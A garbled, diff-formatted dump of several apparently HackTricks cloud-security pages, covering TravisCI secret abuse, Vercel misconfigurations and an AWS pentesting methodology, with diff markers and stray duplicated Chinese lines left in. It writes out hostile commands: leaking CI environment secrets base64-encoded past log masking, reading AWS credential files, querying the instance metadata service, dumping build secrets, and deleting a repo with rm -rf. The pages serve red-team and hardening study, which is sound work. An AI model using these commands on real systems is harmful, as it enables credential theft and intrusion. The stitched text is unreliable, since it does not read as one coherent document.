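# Encrypted blobs committed to the repo
ENC_FILES=$(find "$REPO" -name '*.enc')
echo "$KEYS"
echo "$ENC_FILES"
rm -rf "$REPO"
```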
### TODO:
- Example build with reverse shell running on Windows/Mac/Linux
- Example build leaking the env base64 encoded in the logs
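For the second TODO item, a hedged `.travis.yml` sketch that leaks the build env base64-encoded into the logs could look like:

```yaml
language: minimal
script:
  # Encoding defeats the masking Travis applies to exact secret values in logs
  - env | base64
```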
### TravisCI Enterprise
If an attacker ends up in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the Worker.** This means that an attacker will be able to move laterally to that server, from which he could be able to:
- escape to the host?
- compromise kubernetes?
- compromise other machines running in the same network?
- compromise new cloud credentials?
## References
- [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/)
- [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security)
{{#include ../../banners/hacktricks-training.md}}

# Basic TravisCI Information
{{#include ../../banners/hacktricks-training.md}}
## Access
TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI.
For example, in Github it will ask for the following permissions:
- `user:email` (read-only)
- `read:org` (read-only)
- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations.
## Encrypted Secrets
### Environment Variables
TravisCI 中,与其他 CI 平台一样,可以在仓库级别**保存秘密**,这些秘密将被加密保存,并在执行构建的机器的**环境变量**中**解密并推送**。
In TravisCI, as in other CI platforms, it's possible to **save secrets at repo level** that will be stored encrypted and then **decrypted and pushed into the environment variables** of the machine executing the build.
![](<../../images/image (203).png>)
It's possible to indicate the **branches for which the secrets are going to be available** (by default all) and also whether TravisCI **should hide the value** if it appears **in the logs** (by default it will).
### Custom Encrypted Secrets
For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repositorys **public key available** to those who have **access** to the repository.
You can access the public key of one repo with:
```
travis pubkey -r <owner>/<repo_name>
travis pubkey -r carlospolop/t-ci-test
```
Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**.
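Under the hood this is plain RSA with the repo's public key. A minimal local sketch of the mechanism — using a throwaway keypair instead of the real one fetched with `travis pubkey`, so the key names and padding here are illustrative assumptions, not Travis internals:

```shell
# Generate a throwaway RSA keypair standing in for the repo's Travis keypair
openssl genrsa -out repo.pem 2048 2>/dev/null
openssl rsa -in repo.pem -pubout -out repo_pub.pem 2>/dev/null

# Encrypt a KEY=value pair with the public key and base64-encode it,
# roughly what `travis encrypt MY_SECRET=supersecret` emits for .travis.yml
echo -n 'MY_SECRET=supersecret' \
  | openssl pkeyutl -encrypt -pubin -inkey repo_pub.pem \
  | base64 | tr -d '\n' > secure.b64

# Travis, holding the private key, recovers the variable at build time
base64 -d secure.b64 | openssl pkeyutl -decrypt -inkey repo.pem
```

Anyone with the public key can *add* encrypted secrets, but only Travis (holding the private key) can recover their values.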
![](<../../images/image (139).png>)
Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings.
### Custom Encrypted Files
In the same way as before, TravisCI also allows you to **encrypt files and then decrypt them during the build**:
```
travis encrypt-file super_secret.txt -r carlospolop/t-ci-test
@@ -49,7 +52,7 @@ storing secure env variables for decryption
Please add the following to your build script (before_install stage in your .travis.yml, for instance):
openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
Pro Tip: You can add it automatically by running with --add.
@@ -57,32 +60,36 @@ Make sure to add super_secret.txt.enc to the git repository.
Make sure not to add super_secret.txt to the git repository.
Commit all changes to your .travis.yml.
```
Note that when encrypting a file, 2 env variables will be configured inside the repo, such as:
![](<../../images/image (170).png>)
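The injected `openssl` decryption step can be reproduced locally to see exactly what happens at build time. The key/IV below are dummy values generated on the spot, standing in for the `$encrypted_*_key`/`$encrypted_*_iv` variables Travis stores in the repo settings:

```shell
# Dummy hex-encoded key/IV standing in for $encrypted_..._key / $encrypted_..._iv
KEY=$(openssl rand -hex 32)   # 256-bit AES key
IV=$(openssl rand -hex 16)    # 128-bit IV

echo 'super secret data' > super_secret.txt

# What `travis encrypt-file` does client-side (encrypt with raw key/IV)
openssl aes-256-cbc -K "$KEY" -iv "$IV" -in super_secret.txt -out super_secret.txt.enc -e

# What the injected before_install command does during the build (decrypt)
openssl aes-256-cbc -K "$KEY" -iv "$IV" -in super_secret.txt.enc -out decrypted.txt -d

cmp super_secret.txt decrypted.txt && echo 'roundtrip OK'
```

This is why leaking those two env variables (e.g. via a log or a malicious PR) is equivalent to leaking the encrypted file itself.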
## TravisCI Enterprise
Travis CI Enterprise is an **on-prem version of Travis CI** that you can deploy **in your infrastructure** - think of it as the server version of Travis CI. It enables an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment that you can configure and secure as you want.
**Travis CI Enterprise consists of two major parts:**
1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc.
2. TCI **Worker** and build environment images (also called OS images).
**TCI Core services require the following:**
1. A **PostgreSQL 11** (or later) database.
2. An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required.
3. Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details.
**TCI Worker requires the following:**
1. An infrastructure where a docker image containing the **Worker and a linked build image** can be deployed.
2. Connectivity to certain Travis CI Core Services components - see [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details.
The number of deployed TCI Worker and build environment OS images determines the total concurrent capacity of the Travis CI Enterprise deployment in your infrastructure.
![](<../../images/image (199).png>)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,436 +2,439 @@
{{#include ../banners/hacktricks-training.md}}
## Basic Information
Vercel 中,**团队**是属于客户的完整 **环境**,而 **项目** 是一个 **应用程序**
In Vercel, a **Team** is the complete **environment** that belongs to a client, and a **project** is an **application**.
For a hardening review of **Vercel** you need to ask for a user with the **Viewer role**, or at least **Project Viewer permission over the projects** to review (in case you only need to check the projects and not the Team configuration).
## Project Settings
### General
**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations.
#### Security Configurations:
- **Transfer**
- **Misconfiguration:** Allows transferring the project to another team.
- **Risk:** An attacker could steal the project.
- **Delete Project**
- **Misconfiguration:** Allows deleting the project.
- **Risk:** Deletion of the project.
---
### Domains
**Purpose:** Manage custom domains, DNS settings, and SSL configurations.
#### Security Configurations:
- **DNS Configuration Errors**
- **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers.
- **Risk:** Domain hijacking, traffic interception, and phishing attacks.
- **SSL/TLS Certificate Management**
- **Misconfiguration:** Using weak or expired SSL/TLS certificates.
- **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality.
- **DNSSEC Implementation**
- **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings.
- **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks.
- **Environment used per domain**
- **Misconfiguration:** Change the environment used by the domain in production.
- **Risk:** Expose potential secrets or functionalities that shouldn't be available in production.
---
### Environments
**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables.
#### Security Configurations:
- **Environment Isolation**
- **Misconfiguration:** Sharing environment variables across environments.
- **Risk:** Leakage of production secrets into development or preview environments, increasing exposure.
- **Access to Sensitive Environments**
- **Misconfiguration:** Allowing broad access to production environments.
- **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches.
---
### Environment Variables
**Purpose:** Manage environment-specific variables and secrets used by the application.
#### Security Configurations:
- **Exposing Sensitive Variables**
- **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
- **Sensitive disabled**
- **Misconfiguration:** If the "Sensitive" option is disabled (the default), it's possible to read the values of the stored secrets.
- **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
- **Shared Environment Variables**
- **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information.
- **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
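A quick way to triage the `NEXT_PUBLIC_` issue during a review is to flag variables whose client-exposing prefix clashes with a secret-looking name. The variables below are made up purely for illustration:

```shell
# Simulated project env: one legitimately public value, one misconfigured secret
export NEXT_PUBLIC_API_URL='https://api.example.com'   # public by design
export NEXT_PUBLIC_DB_PASSWORD='hunter2'               # would be bundled into client-side JS

# Flag NEXT_PUBLIC_ variables with secret-looking names
env | grep '^NEXT_PUBLIC_' | grep -Ei 'secret|password|token|_key' \
  | sed 's/^/FINDING: client-exposed secret: /'
```

Anything this prints deserves a manual check: `NEXT_PUBLIC_` values end up in the JavaScript bundle served to every visitor.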
---
### Git
**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers.
#### Security Configurations:
- **Ignored Build Step (TODO)**
- **Misconfiguration:** This option appears to allow configuring a bash script/command that is executed whenever a new commit is pushed to Github, which could allow RCE.
- **Risk:** TBD
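To illustrate why this matters: whatever command is configured there runs with the build's environment, so an attacker who can edit it could dump build-time secrets. This is simulated below with a fake variable and a local file standing in for a remote exfiltration endpoint (a real payload would `curl` the data out instead):

```shell
# Fake build-time secret standing in for whatever the build environment injects
export VERCEL_DEPLOY_TOKEN='deploy-token-123'

# Hypothetical "Ignored Build Step" payload: dump secret-looking env vars
# somewhere the attacker can read them
env | grep -E 'TOKEN|SECRET|KEY' > /tmp/exfil.txt

cat /tmp/exfil.txt
```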
---
### Integrations
**Purpose:** Connect third-party services and tools to enhance project functionalities.
#### Security Configurations:
- **Insecure Third-Party Integrations**
- **Misconfiguration:** Integrating with untrusted or insecure third-party services.
- **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations.
- **Over-Permissioned Integrations**
- **Misconfiguration:** Granting excessive permissions to integrated services.
- **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions.
- **Lack of Integration Monitoring**
- **Misconfiguration:** Failing to monitor and audit third-party integrations.
- **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches.
---
### Deployment Protection
**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments.
#### Security Configurations:
**Vercel Authentication**
- **Misconfiguration:** Disabling authentication or not enforcing team member checks.
- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse.
**Protection Bypass for Automation**
- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets.
- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments.
**Shareable Links**
- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links.
- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions.
**OPTIONS Allowlist**
- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints.
- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks.
**Password Protection**
- **Misconfiguration:** Using weak passwords or sharing them insecurely.
- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked.
- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
**Deployment Protection Exceptions**
- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently.
- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access.
- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
**Trusted IPs**
- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges.
- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access.
- **Note:** Available on the **Enterprise** plan.
---
### Functions
**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies.
#### Security Configurations:
- **Nothing**
---
### Data Cache
**Purpose:** Manage caching strategies and settings to optimize performance and control data storage.
#### Security Configurations:
- **Purge Cache**
- **Misconfiguration:** Allows deleting all the cache.
- **Risk:** Unauthorized users deleting the cache, leading to a potential DoS.
---
### Cron Jobs
**Purpose:** Schedule automated tasks and scripts to run at specified intervals.
#### Security Configurations:
- **Disable Cron Job**
- **Misconfiguration:** Allows disabling cron jobs declared inside the code.
- **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for).
---
### Log Drains
**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing.
#### Security Configurations:
- Nothing (managed from teams settings)
---
### Security
**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more.
#### Security Configurations:
**Build Logs and Source Protection**
- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly.
- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities.
**Git Fork Protection**
- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews.
- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors.
**Secure Backend Access with OIDC Federation**
- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs.
- **Risk:** Unauthorized access to backend services through flawed authentication flows.
**Deployment Retention Policy**
- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention).
- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments.
**Recently Deleted Deployments**
- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions.
- **Risk:** Loss of critical deployment history, hindering audits and rollbacks.
---
### Advanced
**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security.
#### Security Configurations:
**Directory Listing**
- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file.
- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks.
---
## Project Firewall
### Firewall
#### Security Configurations:
**Enable Attack Challenge Mode**
- **Misconfiguration:** Enabling this improves the web application's defenses against DoS, but at the cost of usability.
- **Risk:** Potential user experience problems.
### Custom Rules & IP Blocking
- **Misconfiguration:** Allows blocking/unblocking traffic.
- **Risk:** Potential DoS by allowing malicious traffic or blocking benign traffic.
---
## Project Deployment
### Source
- **Misconfiguration:** Allows reading the complete source code of the application.
- **Risk:** Potential exposure of sensitive information.
### Skew Protection
- **Misconfiguration:** This protection ensures the client and server application always use the same version, so there are no desynchronizations where the client uses a different version from the server and they no longer understand each other.
- **Risk:** Disabling this (if enabled) could cause DoS problems in future deployments.
---
## Team Settings
### General
#### Security Configurations:
- **Transfer**
- **Misconfiguration:** Allows transferring all the projects to another team.
- **Risk:** An attacker could steal the projects.
- **Delete Team**
- **Misconfiguration:** Allows deleting the team with all its projects.
- **Risk:** Deletion of the projects.
---
### Billing
#### Security Configurations:
- **Speed Insights Cost Limit**
- **Misconfiguration:** An attacker could increase this number.
- **Risk:** Increased costs.
---
### Members
#### Security Configurations:
- **Add members**
- **Misconfiguration:** An attacker could maintain persistence by inviting an account they control.
- **Risk:** Attacker persistence.
- **Roles**
- **Misconfiguration:** Granting more permissions than people need increases the risk to the Vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
- **Risk**: Increases the exposure of the Vercel Team.
---
### Access Groups
An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects.
**Potential Misconfigurations:**
- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions.
- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation.
- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended.
- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions.
- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps.
---
### Log Drains
#### Security Configurations:
- **Log Drains to third parties:**
- **Misconfiguration:** An attacker could configure a Log Drain to steal the logs.
- **Risk:** Partial persistence.
---
### Security & Privacy
#### Security Configurations:
- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard.
- **Misconfiguration:**
- Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting.
- Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain.
- **Risks:**
- **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team.
- **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals.
- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access.
- **Misconfiguration:** Not adding critical Git scopes to the protected list.
- **Risks:**
- **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization.
- **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team.
- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system.
- **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled.
- **Risks:**
- **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members.
- **Data Breach:** Sensitive information like API keys and credentials could be leaked.
- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members.
- **Misconfiguration:**\
Granting access to audit logs to unauthorized team members.
- **Risks:**
- **Privacy Violations:** Exposure of sensitive user activities and data.
- **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks.
- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management.
- **Misconfiguration:** An attacker could backdoor the Team by setting up SAML parameters such as the Entity ID, SSO URL, or certificate fingerprints.
- **Risk:** Attacker persistence.
- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains.
- **Misconfiguration:** Leaving IP address visibility enabled without necessity.
- **Risks:**
- **Privacy Violations:** Non-compliance with data protection regulations like GDPR.
- **Legal Repercussions:** Potential fines and penalties for mishandling personal data.
- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing.
- **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legitimate traffic.
- **Risks:**
- **Service Denial to Legitimate Users:** Blocking access for valid users or partners.
- **Operational Disruptions:** Loss of service availability for certain regions or clients.
---
### Secure Compute
**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy.
#### **Potential Misconfigurations and Risks**
1. **Incorrect AWS Region Selection**
- **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region.
- **Risk:** Increased latency, potential data residency compliance issues, and degraded performance.
2. **Overlapping CIDR Blocks**
- **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks.
- **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks.
3. **Improper VPC Peering Configuration**
- **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates).
- **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches.
4. **Excessive Project Assignments**
- **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation.
- **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others.
5. **Inadequate IP Address Management**
- **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately.
- **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities.
6. **Including Build Containers Unnecessarily**
- **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds.
- **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources.
7. **Failure to Securely Handle Bypass Secrets**
- **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections.
- **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code.
8. **Ignoring Region Failover Configurations**
- **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings.
- **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency.
9. **Exceeding VPC Peering Connection Limits**
- **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections).
- **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions.
10. **Insecure Network Settings**
- **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network.
- **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks.
---
### Environment Variables
**Purpose:** Manage environment-specific variables and secrets used by all the projects.
#### Security Configurations:
- **Exposing Sensitive Variables**
- **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
- **Sensitive disabled**
- **Misconfiguration:** If the "Sensitive" option is disabled (the default), it's possible to read the values of the stored secrets.
- **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
{{#include ../banners/hacktricks-training.md}}

View File

@@ -2,17 +2,17 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
**Before you start pentesting** an **AWS** environment, there are a few **basic things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations, and how to exploit them.
Concepts such as the organization hierarchy, IAM, and other basics are explained in:
{{#ref}}
aws-basic-information/
{{#endref}}
## Labs to learn
- [https://github.com/RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat)
- [https://github.com/BishopFox/iam-vulnerable](https://github.com/BishopFox/iam-vulnerable)
- [http://flaws.cloud/](http://flaws.cloud/)
- [http://flaws2.cloud/](http://flaws2.cloud/)
Tools to simulate attacks:
- [https://github.com/Datadog/stratus-red-team/](https://github.com/Datadog/stratus-red-team/)
- [https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main](https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main)
## AWS Pentester/Red Team Methodology
In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how internal AWS services and **external services** are connected.
From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that:
- **Leaks** in github (or similar) - OSINT
- **Social** Engineering
- **Password** reuse (password leaks)
- Vulnerabilities in AWS-Hosted Applications
- [**Server Side Request Forgery**](https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html) with access to metadata endpoint
- **Local File Read**
- `/home/USERNAME/.aws/credentials`
- `C:\Users\USERNAME\.aws\credentials`
- 3rd parties **breached**
- **Internal** Employee
- [**Cognito**](aws-services/aws-cognito-enum/index.html#cognito) credentials
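The local credential files listed above use a simple INI layout; a minimal extraction sketch (using a demo file with the AWS documentation example key, not real credentials):

```bash
# Write a demo file in the same format as ~/.aws/credentials
CREDS=/tmp/demo_credentials
cat > "$CREDS" <<'EOF'
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
EOF

# Pull out any access key IDs present in the file
awk -F' *= *' '$1=="aws_access_key_id"{print $2}' "$CREDS"
```

The same one-liner works against any credentials file recovered via local file read.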
Or by **compromising an unauthenticated service** exposed:
{{#ref}}
aws-unauthenticated-enum-access/
{{#endref}}
Or if you are doing a **review** you could just **ask for credentials** with these roles:
{{#ref}}
aws-permissions-for-a-pentest.md
{{#endref}}
> [!NOTE]
> After you have managed to obtain credentials, you need to know **who those creds belong to** and **what they have access to**, so you need to perform some basic enumeration:
## Basic Enumeration
### SSRF
If you find an SSRF in a machine inside AWS, check this page for tricks:
{{#ref}}
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html
{{#endref}}
### Whoami
One of the first things you need to know is who you are (which account you are in, and other info about the AWS environment):
```bash
# Easiest way, but might be monitored?
aws sts get-caller-identity
aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document
```
> [!CAUTION]
> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\
> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
### Org Enumeration
{{#ref}}
aws-services/aws-organizations-enum.md
{{#endref}}
### IAM Enumeration
If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**.
If you don't have enough permissions to enumerate IAM, you can **brute-force them** to figure them out.\
Check **how to do the enumeration and brute-forcing** in:
{{#ref}}
aws-services/aws-iam-enum.md
{{#endref}}
> [!NOTE]
> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
> In the following section you can check some ways to **enumerate some common services.**
## Services Enumeration, Post-Exploitation & Persistence
AWS has an astonishing amount of services; in the following page you will find **basic information, enumeration cheatsheets**, how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them:
{{#ref}}
aws-services/
{{#endref}}
Note that you **don't** need to perform all the work **manually**; below in this post you can find a **section about** [**automatic tools**](#automated-tools).
Moreover, at this stage you might discover **more services exposed to unauthenticated users** that you might be able to exploit:
{{#ref}}
aws-unauthenticated-enum-access/
{{#endref}}
## Privilege Escalation
If you can **check at least your own permissions** over different resources, you could **check if you are able to obtain further permissions**. You should focus at least on the permissions indicated in:
{{#ref}}
aws-privilege-escalation/
{{#endref}}
## Publicly Exposed Services
While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Container ports, databases or queue services, snapshots or buckets...).\
As a pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** in them, as they might provide you **further access into the AWS account**.
In this book you should find **information** about how to find **exposed AWS services and how to check them**. For how to find **vulnerabilities in exposed network services**, I would recommend you **search** for the specific **service** in:
{{#ref}}
https://book.hacktricks.wiki/
{{#endref}}
### From the root/management account
When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`**, with the **AdministratorAccess** policy attached, allowing the **management account** to access the new account.
<figure><img src="../../images/image (171).png" alt=""><figcaption></figcaption></figure>
So, in order to access a child account as administrator you need to:
- **Compromise** the **management** account and find the **IDs** of the **child accounts** and the **name** of the **role** (`OrganizationAccountAccessRole` by default) allowing the management account to access as admin.
- To find child accounts, go to the Organizations section in the AWS console or run `aws organizations list-accounts`
- You cannot find the name of the roles directly, so check all the custom IAM policies and search for any allowing **`sts:AssumeRole` over the previously discovered child accounts**.
- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the child accounts** (even if the account allows anyone from the management account to impersonate it, as it's an external account, specific `sts:AssumeRole` permissions are necessary).
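The steps above can be sketched with the CLI (the child account ID and session name are placeholders, and the role may have been renamed from the default):

```bash
# List child accounts (requires organizations:ListAccounts in the management account):
# aws organizations list-accounts --query 'Accounts[].[Id,Name]' --output text

# Build the ARN of the default cross-account admin role in a child account
CHILD_ID=123456789012   # placeholder child account ID
ROLE_ARN="arn:aws:iam::${CHILD_ID}:role/OrganizationAccountAccessRole"
echo "$ROLE_ARN"

# With valid management-account credentials you would then run:
# aws sts assume-role --role-arn "$ROLE_ARN" --role-session-name pentest
```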
## Automated Tools
### Recon
- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby.
```bash
# Install
gem install aws_recon
# Recon and get json
AWS_PROFILE=<profile> aws_recon \
  --services S3,EC2 \
  --regions global,us-east-1,us-east-2 \
  --verbose
```
- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues.
```bash
# Installation steps in github
# Create a config.json file with the aws info, like:
{
  "accounts": [
    {
      "default": true,
      "id": "<account id>",
      "name": "dev"
    }
  ],
  "cidrs": {
    "2.2.2.2/28": {"name": "NY Office"}
  }
}
# Enumerate
python3 cloudmapper.py public --accounts dev
python cloudmapper.py prepare #Prepare webserver
python cloudmapper.py webserver #Show webserver
```
- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
```bash
# Install
pip install cartography
# Get AWS info
AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j
```
- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account.
- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account.
### Privesc & Exploiting
